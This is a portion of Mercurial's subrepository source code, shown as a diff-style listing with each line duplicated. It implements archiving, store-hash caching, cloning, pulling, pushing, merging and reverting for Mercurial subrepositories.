552 def outgoing(self, ui, dest, opts):
553 return 1
553 return 1
554
554
555 def incoming(self, ui, source, opts):
555 def incoming(self, ui, source, opts):
556 return 1
556 return 1
557
557
558 def files(self):
558 def files(self):
559 """return filename iterator"""
559 """return filename iterator"""
560 raise NotImplementedError
560 raise NotImplementedError
561
561
562 def filedata(self, name, decode):
562 def filedata(self, name, decode):
563 """return file data, optionally passed through repo decoders"""
563 """return file data, optionally passed through repo decoders"""
564 raise NotImplementedError
564 raise NotImplementedError
565
565
566 def fileflags(self, name):
566 def fileflags(self, name):
567 """return file flags"""
567 """return file flags"""
568 return ''
568 return ''
569
569
570 def getfileset(self, expr):
570 def getfileset(self, expr):
571 """Resolve the fileset expression for this repo"""
571 """Resolve the fileset expression for this repo"""
572 return set()
572 return set()
573
573
574 def printfiles(self, ui, m, fm, fmt, subrepos):
574 def printfiles(self, ui, m, fm, fmt, subrepos):
575 """handle the files command for this subrepo"""
575 """handle the files command for this subrepo"""
576 return 1
576 return 1
577
577
578 def archive(self, archiver, prefix, match=None, decode=True):
578 def archive(self, archiver, prefix, match=None, decode=True):
579 if match is not None:
579 if match is not None:
580 files = [f for f in self.files() if match(f)]
580 files = [f for f in self.files() if match(f)]
581 else:
581 else:
582 files = self.files()
582 files = self.files()
583 total = len(files)
583 total = len(files)
584 relpath = subrelpath(self)
584 relpath = subrelpath(self)
585 self.ui.progress(_('archiving (%s)') % relpath, 0,
585 self.ui.progress(_('archiving (%s)') % relpath, 0,
586 unit=_('files'), total=total)
586 unit=_('files'), total=total)
587 for i, name in enumerate(files):
587 for i, name in enumerate(files):
588 flags = self.fileflags(name)
588 flags = self.fileflags(name)
589 mode = 'x' in flags and 0o755 or 0o644
589 mode = 'x' in flags and 0o755 or 0o644
590 symlink = 'l' in flags
590 symlink = 'l' in flags
591 archiver.addfile(prefix + self._path + '/' + name,
591 archiver.addfile(prefix + self._path + '/' + name,
592 mode, symlink, self.filedata(name, decode))
592 mode, symlink, self.filedata(name, decode))
593 self.ui.progress(_('archiving (%s)') % relpath, i + 1,
593 self.ui.progress(_('archiving (%s)') % relpath, i + 1,
594 unit=_('files'), total=total)
594 unit=_('files'), total=total)
595 self.ui.progress(_('archiving (%s)') % relpath, None)
595 self.ui.progress(_('archiving (%s)') % relpath, None)
596 return total
596 return total
597
597
598 def walk(self, match):
598 def walk(self, match):
599 '''
599 '''
600 walk recursively through the directory tree, finding all files
600 walk recursively through the directory tree, finding all files
601 matched by the match function
601 matched by the match function
602 '''
602 '''
603 pass
603 pass
604
604
605 def forget(self, match, prefix):
605 def forget(self, match, prefix):
606 return ([], [])
606 return ([], [])
607
607
608 def removefiles(self, matcher, prefix, after, force, subrepos, warnings):
608 def removefiles(self, matcher, prefix, after, force, subrepos, warnings):
609 """remove the matched files from the subrepository and the filesystem,
609 """remove the matched files from the subrepository and the filesystem,
610 possibly by force and/or after the file has been removed from the
610 possibly by force and/or after the file has been removed from the
611 filesystem. Return 0 on success, 1 on any warning.
611 filesystem. Return 0 on success, 1 on any warning.
612 """
612 """
613 warnings.append(_("warning: removefiles not implemented (%s)")
613 warnings.append(_("warning: removefiles not implemented (%s)")
614 % self._path)
614 % self._path)
615 return 1
615 return 1
616
616
617 def revert(self, substate, *pats, **opts):
617 def revert(self, substate, *pats, **opts):
618 self.ui.warn(_('%s: reverting %s subrepos is unsupported\n') \
618 self.ui.warn(_('%s: reverting %s subrepos is unsupported\n') \
619 % (substate[0], substate[2]))
619 % (substate[0], substate[2]))
620 return []
620 return []
621
621
622 def shortid(self, revid):
622 def shortid(self, revid):
623 return revid
623 return revid
624
624
625 def verify(self):
625 def verify(self):
626 '''verify the integrity of the repository. Return 0 on success or
626 '''verify the integrity of the repository. Return 0 on success or
627 warning, 1 on any error.
627 warning, 1 on any error.
628 '''
628 '''
629 return 0
629 return 0
630
630
631 @propertycache
631 @propertycache
632 def wvfs(self):
632 def wvfs(self):
633 """return vfs to access the working directory of this subrepository
633 """return vfs to access the working directory of this subrepository
634 """
634 """
635 return vfsmod.vfs(self._ctx.repo().wvfs.join(self._path))
635 return vfsmod.vfs(self._ctx.repo().wvfs.join(self._path))
636
636
637 @propertycache
637 @propertycache
638 def _relpath(self):
638 def _relpath(self):
639 """return path to this subrepository as seen from outermost repository
639 """return path to this subrepository as seen from outermost repository
640 """
640 """
641 return self.wvfs.reljoin(reporelpath(self._ctx.repo()), self._path)
641 return self.wvfs.reljoin(reporelpath(self._ctx.repo()), self._path)
642
642
643 class hgsubrepo(abstractsubrepo):
643 class hgsubrepo(abstractsubrepo):
644 def __init__(self, ctx, path, state, allowcreate):
644 def __init__(self, ctx, path, state, allowcreate):
645 super(hgsubrepo, self).__init__(ctx, path)
645 super(hgsubrepo, self).__init__(ctx, path)
646 self._state = state
646 self._state = state
647 r = ctx.repo()
647 r = ctx.repo()
648 root = r.wjoin(path)
648 root = r.wjoin(path)
649 create = allowcreate and not r.wvfs.exists('%s/.hg' % path)
649 create = allowcreate and not r.wvfs.exists('%s/.hg' % path)
650 self._repo = hg.repository(r.baseui, root, create=create)
650 self._repo = hg.repository(r.baseui, root, create=create)
651
651
652 # Propagate the parent's --hidden option
652 # Propagate the parent's --hidden option
653 if r is r.unfiltered():
653 if r is r.unfiltered():
654 self._repo = self._repo.unfiltered()
654 self._repo = self._repo.unfiltered()
655
655
656 self.ui = self._repo.ui
656 self.ui = self._repo.ui
657 for s, k in [('ui', 'commitsubrepos')]:
657 for s, k in [('ui', 'commitsubrepos')]:
658 v = r.ui.config(s, k)
658 v = r.ui.config(s, k)
659 if v:
659 if v:
660 self.ui.setconfig(s, k, v, 'subrepo')
660 self.ui.setconfig(s, k, v, 'subrepo')
661 # internal config: ui._usedassubrepo
661 # internal config: ui._usedassubrepo
662 self.ui.setconfig('ui', '_usedassubrepo', 'True', 'subrepo')
662 self.ui.setconfig('ui', '_usedassubrepo', 'True', 'subrepo')
663 self._initrepo(r, state[0], create)
663 self._initrepo(r, state[0], create)
664
664
665 @annotatesubrepoerror
665 @annotatesubrepoerror
666 def addwebdirpath(self, serverpath, webconf):
666 def addwebdirpath(self, serverpath, webconf):
667 cmdutil.addwebdirpath(self._repo, subrelpath(self), webconf)
667 cmdutil.addwebdirpath(self._repo, subrelpath(self), webconf)
668
668
669 def storeclean(self, path):
669 def storeclean(self, path):
670 with self._repo.lock():
670 with self._repo.lock():
671 return self._storeclean(path)
671 return self._storeclean(path)
672
672
673 def _storeclean(self, path):
673 def _storeclean(self, path):
674 clean = True
674 clean = True
675 itercache = self._calcstorehash(path)
675 itercache = self._calcstorehash(path)
676 for filehash in self._readstorehashcache(path):
676 for filehash in self._readstorehashcache(path):
677 if filehash != next(itercache, None):
677 if filehash != next(itercache, None):
678 clean = False
678 clean = False
679 break
679 break
680 if clean:
680 if clean:
681 # if not empty:
681 # if not empty:
682 # the cached and current pull states have a different size
682 # the cached and current pull states have a different size
683 clean = next(itercache, None) is None
683 clean = next(itercache, None) is None
684 return clean
684 return clean
685
685
686 def _calcstorehash(self, remotepath):
686 def _calcstorehash(self, remotepath):
687 '''calculate a unique "store hash"
687 '''calculate a unique "store hash"
688
688
689 This method is used to to detect when there are changes that may
689 This method is used to to detect when there are changes that may
690 require a push to a given remote path.'''
690 require a push to a given remote path.'''
691 # sort the files that will be hashed in increasing (likely) file size
691 # sort the files that will be hashed in increasing (likely) file size
692 filelist = ('bookmarks', 'store/phaseroots', 'store/00changelog.i')
692 filelist = ('bookmarks', 'store/phaseroots', 'store/00changelog.i')
693 yield '# %s\n' % _expandedabspath(remotepath)
693 yield '# %s\n' % _expandedabspath(remotepath)
694 vfs = self._repo.vfs
694 vfs = self._repo.vfs
695 for relname in filelist:
695 for relname in filelist:
696 filehash = hashlib.sha1(vfs.tryread(relname)).hexdigest()
696 filehash = hashlib.sha1(vfs.tryread(relname)).hexdigest()
697 yield '%s = %s\n' % (relname, filehash)
697 yield '%s = %s\n' % (relname, filehash)
698
698
699 @propertycache
699 @propertycache
700 def _cachestorehashvfs(self):
700 def _cachestorehashvfs(self):
701 return vfsmod.vfs(self._repo.vfs.join('cache/storehash'))
701 return vfsmod.vfs(self._repo.vfs.join('cache/storehash'))
702
702
703 def _readstorehashcache(self, remotepath):
703 def _readstorehashcache(self, remotepath):
704 '''read the store hash cache for a given remote repository'''
704 '''read the store hash cache for a given remote repository'''
705 cachefile = _getstorehashcachename(remotepath)
705 cachefile = _getstorehashcachename(remotepath)
706 return self._cachestorehashvfs.tryreadlines(cachefile, 'r')
706 return self._cachestorehashvfs.tryreadlines(cachefile, 'r')
707
707
708 def _cachestorehash(self, remotepath):
708 def _cachestorehash(self, remotepath):
709 '''cache the current store hash
709 '''cache the current store hash
710
710
711 Each remote repo requires its own store hash cache, because a subrepo
711 Each remote repo requires its own store hash cache, because a subrepo
712 store may be "clean" versus a given remote repo, but not versus another
712 store may be "clean" versus a given remote repo, but not versus another
713 '''
713 '''
714 cachefile = _getstorehashcachename(remotepath)
714 cachefile = _getstorehashcachename(remotepath)
715 with self._repo.lock():
715 with self._repo.lock():
716 storehash = list(self._calcstorehash(remotepath))
716 storehash = list(self._calcstorehash(remotepath))
717 vfs = self._cachestorehashvfs
717 vfs = self._cachestorehashvfs
718 vfs.writelines(cachefile, storehash, mode='w', notindexed=True)
718 vfs.writelines(cachefile, storehash, mode='w', notindexed=True)
719
719
720 def _getctx(self):
720 def _getctx(self):
721 '''fetch the context for this subrepo revision, possibly a workingctx
721 '''fetch the context for this subrepo revision, possibly a workingctx
722 '''
722 '''
723 if self._ctx.rev() is None:
723 if self._ctx.rev() is None:
724 return self._repo[None] # workingctx if parent is workingctx
724 return self._repo[None] # workingctx if parent is workingctx
725 else:
725 else:
726 rev = self._state[1]
726 rev = self._state[1]
727 return self._repo[rev]
727 return self._repo[rev]
728
728
729 @annotatesubrepoerror
729 @annotatesubrepoerror
730 def _initrepo(self, parentrepo, source, create):
730 def _initrepo(self, parentrepo, source, create):
731 self._repo._subparent = parentrepo
731 self._repo._subparent = parentrepo
732 self._repo._subsource = source
732 self._repo._subsource = source
733
733
734 if create:
734 if create:
735 lines = ['[paths]\n']
735 lines = ['[paths]\n']
736
736
737 def addpathconfig(key, value):
737 def addpathconfig(key, value):
738 if value:
738 if value:
739 lines.append('%s = %s\n' % (key, value))
739 lines.append('%s = %s\n' % (key, value))
740 self.ui.setconfig('paths', key, value, 'subrepo')
740 self.ui.setconfig('paths', key, value, 'subrepo')
741
741
742 defpath = _abssource(self._repo, abort=False)
742 defpath = _abssource(self._repo, abort=False)
743 defpushpath = _abssource(self._repo, True, abort=False)
743 defpushpath = _abssource(self._repo, True, abort=False)
744 addpathconfig('default', defpath)
744 addpathconfig('default', defpath)
745 if defpath != defpushpath:
745 if defpath != defpushpath:
746 addpathconfig('default-push', defpushpath)
746 addpathconfig('default-push', defpushpath)
747
747
748 fp = self._repo.vfs("hgrc", "w", text=True)
748 fp = self._repo.vfs("hgrc", "w", text=True)
749 try:
749 try:
750 fp.write(''.join(lines))
750 fp.write(''.join(lines))
751 finally:
751 finally:
752 fp.close()
752 fp.close()
753
753
754 @annotatesubrepoerror
754 @annotatesubrepoerror
755 def add(self, ui, match, prefix, explicitonly, **opts):
755 def add(self, ui, match, prefix, explicitonly, **opts):
756 return cmdutil.add(ui, self._repo, match,
756 return cmdutil.add(ui, self._repo, match,
757 self.wvfs.reljoin(prefix, self._path),
757 self.wvfs.reljoin(prefix, self._path),
758 explicitonly, **opts)
758 explicitonly, **opts)
759
759
760 @annotatesubrepoerror
760 @annotatesubrepoerror
761 def addremove(self, m, prefix, opts, dry_run, similarity):
761 def addremove(self, m, prefix, opts, dry_run, similarity):
762 # In the same way as sub directories are processed, once in a subrepo,
762 # In the same way as sub directories are processed, once in a subrepo,
763 # always entry any of its subrepos. Don't corrupt the options that will
763 # always entry any of its subrepos. Don't corrupt the options that will
764 # be used to process sibling subrepos however.
764 # be used to process sibling subrepos however.
765 opts = copy.copy(opts)
765 opts = copy.copy(opts)
766 opts['subrepos'] = True
766 opts['subrepos'] = True
767 return scmutil.addremove(self._repo, m,
767 return scmutil.addremove(self._repo, m,
768 self.wvfs.reljoin(prefix, self._path), opts,
768 self.wvfs.reljoin(prefix, self._path), opts,
769 dry_run, similarity)
769 dry_run, similarity)
770
770
771 @annotatesubrepoerror
771 @annotatesubrepoerror
772 def cat(self, match, fm, fntemplate, prefix, **opts):
772 def cat(self, match, fm, fntemplate, prefix, **opts):
773 rev = self._state[1]
773 rev = self._state[1]
774 ctx = self._repo[rev]
774 ctx = self._repo[rev]
775 return cmdutil.cat(self.ui, self._repo, ctx, match, fm, fntemplate,
775 return cmdutil.cat(self.ui, self._repo, ctx, match, fm, fntemplate,
776 prefix, **opts)
776 prefix, **opts)
777
777
778 @annotatesubrepoerror
778 @annotatesubrepoerror
779 def status(self, rev2, **opts):
779 def status(self, rev2, **opts):
780 try:
780 try:
781 rev1 = self._state[1]
781 rev1 = self._state[1]
782 ctx1 = self._repo[rev1]
782 ctx1 = self._repo[rev1]
783 ctx2 = self._repo[rev2]
783 ctx2 = self._repo[rev2]
784 return self._repo.status(ctx1, ctx2, **opts)
784 return self._repo.status(ctx1, ctx2, **opts)
785 except error.RepoLookupError as inst:
785 except error.RepoLookupError as inst:
786 self.ui.warn(_('warning: error "%s" in subrepository "%s"\n')
786 self.ui.warn(_('warning: error "%s" in subrepository "%s"\n')
787 % (inst, subrelpath(self)))
787 % (inst, subrelpath(self)))
788 return scmutil.status([], [], [], [], [], [], [])
788 return scmutil.status([], [], [], [], [], [], [])
789
789
790 @annotatesubrepoerror
790 @annotatesubrepoerror
791 def diff(self, ui, diffopts, node2, match, prefix, **opts):
791 def diff(self, ui, diffopts, node2, match, prefix, **opts):
792 try:
792 try:
793 node1 = node.bin(self._state[1])
793 node1 = node.bin(self._state[1])
794 # We currently expect node2 to come from substate and be
794 # We currently expect node2 to come from substate and be
795 # in hex format
795 # in hex format
796 if node2 is not None:
796 if node2 is not None:
797 node2 = node.bin(node2)
797 node2 = node.bin(node2)
798 cmdutil.diffordiffstat(ui, self._repo, diffopts,
798 cmdutil.diffordiffstat(ui, self._repo, diffopts,
799 node1, node2, match,
799 node1, node2, match,
800 prefix=posixpath.join(prefix, self._path),
800 prefix=posixpath.join(prefix, self._path),
801 listsubrepos=True, **opts)
801 listsubrepos=True, **opts)
802 except error.RepoLookupError as inst:
802 except error.RepoLookupError as inst:
803 self.ui.warn(_('warning: error "%s" in subrepository "%s"\n')
803 self.ui.warn(_('warning: error "%s" in subrepository "%s"\n')
804 % (inst, subrelpath(self)))
804 % (inst, subrelpath(self)))
805
805
806 @annotatesubrepoerror
806 @annotatesubrepoerror
807 def archive(self, archiver, prefix, match=None, decode=True):
807 def archive(self, archiver, prefix, match=None, decode=True):
808 self._get(self._state + ('hg',))
808 self._get(self._state + ('hg',))
809 total = abstractsubrepo.archive(self, archiver, prefix, match)
809 total = abstractsubrepo.archive(self, archiver, prefix, match)
810 rev = self._state[1]
810 rev = self._state[1]
811 ctx = self._repo[rev]
811 ctx = self._repo[rev]
812 for subpath in ctx.substate:
812 for subpath in ctx.substate:
813 s = subrepo(ctx, subpath, True)
813 s = subrepo(ctx, subpath, True)
814 submatch = matchmod.subdirmatcher(subpath, match)
814 submatch = matchmod.subdirmatcher(subpath, match)
815 total += s.archive(archiver, prefix + self._path + '/', submatch,
815 total += s.archive(archiver, prefix + self._path + '/', submatch,
816 decode)
816 decode)
817 return total
817 return total
818
818
819 @annotatesubrepoerror
819 @annotatesubrepoerror
820 def dirty(self, ignoreupdate=False, missing=False):
820 def dirty(self, ignoreupdate=False, missing=False):
821 r = self._state[1]
821 r = self._state[1]
822 if r == '' and not ignoreupdate: # no state recorded
822 if r == '' and not ignoreupdate: # no state recorded
823 return True
823 return True
824 w = self._repo[None]
824 w = self._repo[None]
825 if r != w.p1().hex() and not ignoreupdate:
825 if r != w.p1().hex() and not ignoreupdate:
826 # different version checked out
826 # different version checked out
827 return True
827 return True
828 return w.dirty(missing=missing) # working directory changed
828 return w.dirty(missing=missing) # working directory changed
829
829
830 def basestate(self):
830 def basestate(self):
831 return self._repo['.'].hex()
831 return self._repo['.'].hex()
832
832
833 def checknested(self, path):
833 def checknested(self, path):
834 return self._repo._checknested(self._repo.wjoin(path))
834 return self._repo._checknested(self._repo.wjoin(path))
835
835
836 @annotatesubrepoerror
836 @annotatesubrepoerror
837 def commit(self, text, user, date):
837 def commit(self, text, user, date):
838 # don't bother committing in the subrepo if it's only been
838 # don't bother committing in the subrepo if it's only been
839 # updated
839 # updated
840 if not self.dirty(True):
840 if not self.dirty(True):
841 return self._repo['.'].hex()
841 return self._repo['.'].hex()
842 self.ui.debug("committing subrepo %s\n" % subrelpath(self))
842 self.ui.debug("committing subrepo %s\n" % subrelpath(self))
843 n = self._repo.commit(text, user, date)
843 n = self._repo.commit(text, user, date)
844 if not n:
844 if not n:
845 return self._repo['.'].hex() # different version checked out
845 return self._repo['.'].hex() # different version checked out
846 return node.hex(n)
846 return node.hex(n)
847
847
848 @annotatesubrepoerror
848 @annotatesubrepoerror
849 def phase(self, state):
849 def phase(self, state):
850 return self._repo[state].phase()
850 return self._repo[state].phase()
851
851
852 @annotatesubrepoerror
852 @annotatesubrepoerror
853 def remove(self):
853 def remove(self):
854 # we can't fully delete the repository as it may contain
854 # we can't fully delete the repository as it may contain
855 # local-only history
855 # local-only history
856 self.ui.note(_('removing subrepo %s\n') % subrelpath(self))
856 self.ui.note(_('removing subrepo %s\n') % subrelpath(self))
857 hg.clean(self._repo, node.nullid, False)
857 hg.clean(self._repo, node.nullid, False)
858
858
859 def _get(self, state):
859 def _get(self, state):
860 source, revision, kind = state
860 source, revision, kind = state
861 if revision in self._repo.unfiltered():
861 if revision in self._repo.unfiltered():
862 return True
862 return True
863 self._repo._subsource = source
863 self._repo._subsource = source
864 srcurl = _abssource(self._repo)
864 srcurl = _abssource(self._repo)
865 other = hg.peer(self._repo, {}, srcurl)
865 other = hg.peer(self._repo, {}, srcurl)
866 if len(self._repo) == 0:
866 if len(self._repo) == 0:
867 self.ui.status(_('cloning subrepo %s from %s\n')
867 self.ui.status(_('cloning subrepo %s from %s\n')
868 % (subrelpath(self), srcurl))
868 % (subrelpath(self), srcurl))
869 parentrepo = self._repo._subparent
869 parentrepo = self._repo._subparent
870 # use self._repo.vfs instead of self.wvfs to remove .hg only
870 # use self._repo.vfs instead of self.wvfs to remove .hg only
871 self._repo.vfs.rmtree()
871 self._repo.vfs.rmtree()
872 other, cloned = hg.clone(self._repo._subparent.baseui, {},
872 other, cloned = hg.clone(self._repo._subparent.baseui, {},
873 other, self._repo.root,
873 other, self._repo.root,
874 update=False)
874 update=False)
875 self._repo = cloned.local()
875 self._repo = cloned.local()
876 self._initrepo(parentrepo, source, create=True)
876 self._initrepo(parentrepo, source, create=True)
877 self._cachestorehash(srcurl)
877 self._cachestorehash(srcurl)
878 else:
878 else:
879 self.ui.status(_('pulling subrepo %s from %s\n')
879 self.ui.status(_('pulling subrepo %s from %s\n')
880 % (subrelpath(self), srcurl))
880 % (subrelpath(self), srcurl))
881 cleansub = self.storeclean(srcurl)
881 cleansub = self.storeclean(srcurl)
882 exchange.pull(self._repo, other)
882 exchange.pull(self._repo, other)
883 if cleansub:
883 if cleansub:
884 # keep the repo clean after pull
884 # keep the repo clean after pull
885 self._cachestorehash(srcurl)
885 self._cachestorehash(srcurl)
886 return False
886 return False
887
887
888 @annotatesubrepoerror
888 @annotatesubrepoerror
889 def get(self, state, overwrite=False):
889 def get(self, state, overwrite=False):
890 inrepo = self._get(state)
890 inrepo = self._get(state)
891 source, revision, kind = state
891 source, revision, kind = state
892 repo = self._repo
892 repo = self._repo
893 repo.ui.debug("getting subrepo %s\n" % self._path)
893 repo.ui.debug("getting subrepo %s\n" % self._path)
894 if inrepo:
894 if inrepo:
895 urepo = repo.unfiltered()
895 urepo = repo.unfiltered()
896 ctx = urepo[revision]
896 ctx = urepo[revision]
897 if ctx.hidden():
897 if ctx.hidden():
898 urepo.ui.warn(
898 urepo.ui.warn(
899 _('revision %s in subrepository "%s" is hidden\n') \
899 _('revision %s in subrepository "%s" is hidden\n') \
900 % (revision[0:12], self._path))
900 % (revision[0:12], self._path))
901 repo = urepo
901 repo = urepo
902 hg.updaterepo(repo, revision, overwrite)
902 hg.updaterepo(repo, revision, overwrite)
903
903
904 @annotatesubrepoerror
904 @annotatesubrepoerror
905 def merge(self, state):
905 def merge(self, state):
906 self._get(state)
906 self._get(state)
907 cur = self._repo['.']
907 cur = self._repo['.']
908 dst = self._repo[state[1]]
908 dst = self._repo[state[1]]
909 anc = dst.ancestor(cur)
909 anc = dst.ancestor(cur)
910
910
911 def mergefunc():
911 def mergefunc():
912 if anc == cur and dst.branch() == cur.branch():
912 if anc == cur and dst.branch() == cur.branch():
913 self.ui.debug('updating subrepository "%s"\n'
913 self.ui.debug('updating subrepository "%s"\n'
914 % subrelpath(self))
914 % subrelpath(self))
915 hg.update(self._repo, state[1])
915 hg.update(self._repo, state[1])
916 elif anc == dst:
916 elif anc == dst:
917 self.ui.debug('skipping subrepository "%s"\n'
917 self.ui.debug('skipping subrepository "%s"\n'
918 % subrelpath(self))
918 % subrelpath(self))
919 else:
919 else:
920 self.ui.debug('merging subrepository "%s"\n' % subrelpath(self))
920 self.ui.debug('merging subrepository "%s"\n' % subrelpath(self))
921 hg.merge(self._repo, state[1], remind=False)
921 hg.merge(self._repo, state[1], remind=False)
922
922
923 wctx = self._repo[None]
923 wctx = self._repo[None]
924 if self.dirty():
924 if self.dirty():
925 if anc != dst:
925 if anc != dst:
926 if _updateprompt(self.ui, self, wctx.dirty(), cur, dst):
926 if _updateprompt(self.ui, self, wctx.dirty(), cur, dst):
927 mergefunc()
927 mergefunc()
928 else:
928 else:
929 mergefunc()
929 mergefunc()
930 else:
930 else:
931 mergefunc()
931 mergefunc()
932
932
933 @annotatesubrepoerror
933 @annotatesubrepoerror
934 def push(self, opts):
934 def push(self, opts):
935 force = opts.get('force')
935 force = opts.get('force')
936 newbranch = opts.get('new_branch')
936 newbranch = opts.get('new_branch')
937 ssh = opts.get('ssh')
937 ssh = opts.get('ssh')
938
938
939 # push subrepos depth-first for coherent ordering
939 # push subrepos depth-first for coherent ordering
940 c = self._repo['']
940 c = self._repo['']
941 subs = c.substate # only repos that are committed
941 subs = c.substate # only repos that are committed
942 for s in sorted(subs):
942 for s in sorted(subs):
943 if c.sub(s).push(opts) == 0:
943 if c.sub(s).push(opts) == 0:
944 return False
944 return False
945
945
946 dsturl = _abssource(self._repo, True)
946 dsturl = _abssource(self._repo, True)
947 if not force:
947 if not force:
948 if self.storeclean(dsturl):
948 if self.storeclean(dsturl):
949 self.ui.status(
949 self.ui.status(
950 _('no changes made to subrepo %s since last push to %s\n')
950 _('no changes made to subrepo %s since last push to %s\n')
951 % (subrelpath(self), dsturl))
951 % (subrelpath(self), dsturl))
952 return None
952 return None
953 self.ui.status(_('pushing subrepo %s to %s\n') %
953 self.ui.status(_('pushing subrepo %s to %s\n') %
954 (subrelpath(self), dsturl))
954 (subrelpath(self), dsturl))
955 other = hg.peer(self._repo, {'ssh': ssh}, dsturl)
955 other = hg.peer(self._repo, {'ssh': ssh}, dsturl)
956 res = exchange.push(self._repo, other, force, newbranch=newbranch)
956 res = exchange.push(self._repo, other, force, newbranch=newbranch)
957
957
958 # the repo is now clean
958 # the repo is now clean
959 self._cachestorehash(dsturl)
959 self._cachestorehash(dsturl)
960 return res.cgresult
960 return res.cgresult
961
961
962 @annotatesubrepoerror
962 @annotatesubrepoerror
963 def outgoing(self, ui, dest, opts):
963 def outgoing(self, ui, dest, opts):
964 if 'rev' in opts or 'branch' in opts:
964 if 'rev' in opts or 'branch' in opts:
965 opts = copy.copy(opts)
965 opts = copy.copy(opts)
966 opts.pop('rev', None)
966 opts.pop('rev', None)
967 opts.pop('branch', None)
967 opts.pop('branch', None)
968 return hg.outgoing(ui, self._repo, _abssource(self._repo, True), opts)
968 return hg.outgoing(ui, self._repo, _abssource(self._repo, True), opts)
969
969
970 @annotatesubrepoerror
970 @annotatesubrepoerror
971 def incoming(self, ui, source, opts):
971 def incoming(self, ui, source, opts):
972 if 'rev' in opts or 'branch' in opts:
972 if 'rev' in opts or 'branch' in opts:
973 opts = copy.copy(opts)
973 opts = copy.copy(opts)
974 opts.pop('rev', None)
974 opts.pop('rev', None)
975 opts.pop('branch', None)
975 opts.pop('branch', None)
976 return hg.incoming(ui, self._repo, _abssource(self._repo, False), opts)
976 return hg.incoming(ui, self._repo, _abssource(self._repo, False), opts)
977
977
978 @annotatesubrepoerror
978 @annotatesubrepoerror
979 def files(self):
979 def files(self):
980 rev = self._state[1]
980 rev = self._state[1]
981 ctx = self._repo[rev]
981 ctx = self._repo[rev]
982 return ctx.manifest().keys()
982 return ctx.manifest().keys()
983
983
984 def filedata(self, name, decode):
984 def filedata(self, name, decode):
985 rev = self._state[1]
985 rev = self._state[1]
986 data = self._repo[rev][name].data()
986 data = self._repo[rev][name].data()
987 if decode:
987 if decode:
988 data = self._repo.wwritedata(name, data)
988 data = self._repo.wwritedata(name, data)
989 return data
989 return data
990
990
991 def fileflags(self, name):
991 def fileflags(self, name):
992 rev = self._state[1]
992 rev = self._state[1]
993 ctx = self._repo[rev]
993 ctx = self._repo[rev]
994 return ctx.flags(name)
994 return ctx.flags(name)
995
995
996 @annotatesubrepoerror
996 @annotatesubrepoerror
997 def printfiles(self, ui, m, fm, fmt, subrepos):
997 def printfiles(self, ui, m, fm, fmt, subrepos):
998 # If the parent context is a workingctx, use the workingctx here for
998 # If the parent context is a workingctx, use the workingctx here for
999 # consistency.
999 # consistency.
1000 if self._ctx.rev() is None:
1000 if self._ctx.rev() is None:
1001 ctx = self._repo[None]
1001 ctx = self._repo[None]
1002 else:
1002 else:
1003 rev = self._state[1]
1003 rev = self._state[1]
1004 ctx = self._repo[rev]
1004 ctx = self._repo[rev]
1005 return cmdutil.files(ui, ctx, m, fm, fmt, subrepos)
1005 return cmdutil.files(ui, ctx, m, fm, fmt, subrepos)
1006
1006
1007 @annotatesubrepoerror
1007 @annotatesubrepoerror
1008 def getfileset(self, expr):
1008 def getfileset(self, expr):
1009 if self._ctx.rev() is None:
1009 if self._ctx.rev() is None:
1010 ctx = self._repo[None]
1010 ctx = self._repo[None]
1011 else:
1011 else:
1012 rev = self._state[1]
1012 rev = self._state[1]
1013 ctx = self._repo[rev]
1013 ctx = self._repo[rev]
1014
1014
1015 files = ctx.getfileset(expr)
1015 files = ctx.getfileset(expr)
1016
1016
1017 for subpath in ctx.substate:
1017 for subpath in ctx.substate:
1018 sub = ctx.sub(subpath)
1018 sub = ctx.sub(subpath)
1019
1019
1020 try:
1020 try:
1021 files.extend(subpath + '/' + f for f in sub.getfileset(expr))
1021 files.extend(subpath + '/' + f for f in sub.getfileset(expr))
1022 except error.LookupError:
1022 except error.LookupError:
1023 self.ui.status(_("skipping missing subrepository: %s\n")
1023 self.ui.status(_("skipping missing subrepository: %s\n")
1024 % self.wvfs.reljoin(reporelpath(self), subpath))
1024 % self.wvfs.reljoin(reporelpath(self), subpath))
1025 return files
1025 return files
1026
1026
1027 def walk(self, match):
1027 def walk(self, match):
1028 ctx = self._repo[None]
1028 ctx = self._repo[None]
1029 return ctx.walk(match)
1029 return ctx.walk(match)
1030
1030
1031 @annotatesubrepoerror
1031 @annotatesubrepoerror
1032 def forget(self, match, prefix):
1032 def forget(self, match, prefix):
1033 return cmdutil.forget(self.ui, self._repo, match,
1033 return cmdutil.forget(self.ui, self._repo, match,
1034 self.wvfs.reljoin(prefix, self._path), True)
1034 self.wvfs.reljoin(prefix, self._path), True)
1035
1035
1036 @annotatesubrepoerror
1036 @annotatesubrepoerror
1037 def removefiles(self, matcher, prefix, after, force, subrepos, warnings):
1037 def removefiles(self, matcher, prefix, after, force, subrepos, warnings):
1038 return cmdutil.remove(self.ui, self._repo, matcher,
1038 return cmdutil.remove(self.ui, self._repo, matcher,
1039 self.wvfs.reljoin(prefix, self._path),
1039 self.wvfs.reljoin(prefix, self._path),
1040 after, force, subrepos)
1040 after, force, subrepos)
1041
1041
1042 @annotatesubrepoerror
1042 @annotatesubrepoerror
1043 def revert(self, substate, *pats, **opts):
1043 def revert(self, substate, *pats, **opts):
1044 # reverting a subrepo is a 2 step process:
1044 # reverting a subrepo is a 2 step process:
1045 # 1. if the no_backup is not set, revert all modified
1045 # 1. if the no_backup is not set, revert all modified
1046 # files inside the subrepo
1046 # files inside the subrepo
1047 # 2. update the subrepo to the revision specified in
1047 # 2. update the subrepo to the revision specified in
1048 # the corresponding substate dictionary
1048 # the corresponding substate dictionary
1049 self.ui.status(_('reverting subrepo %s\n') % substate[0])
1049 self.ui.status(_('reverting subrepo %s\n') % substate[0])
1050 if not opts.get('no_backup'):
1050 if not opts.get('no_backup'):
1051 # Revert all files on the subrepo, creating backups
1051 # Revert all files on the subrepo, creating backups
1052 # Note that this will not recursively revert subrepos
1052 # Note that this will not recursively revert subrepos
1053 # We could do it if there was a set:subrepos() predicate
1053 # We could do it if there was a set:subrepos() predicate
1054 opts = opts.copy()
1054 opts = opts.copy()
1055 opts['date'] = None
1055 opts['date'] = None
1056 opts['rev'] = substate[1]
1056 opts['rev'] = substate[1]
1057
1057
1058 self.filerevert(*pats, **opts)
1058 self.filerevert(*pats, **opts)
1059
1059
1060 # Update the repo to the revision specified in the given substate
1060 # Update the repo to the revision specified in the given substate
1061 if not opts.get('dry_run'):
1061 if not opts.get('dry_run'):
1062 self.get(substate, overwrite=True)
1062 self.get(substate, overwrite=True)
1063
1063
1064 def filerevert(self, *pats, **opts):
1064 def filerevert(self, *pats, **opts):
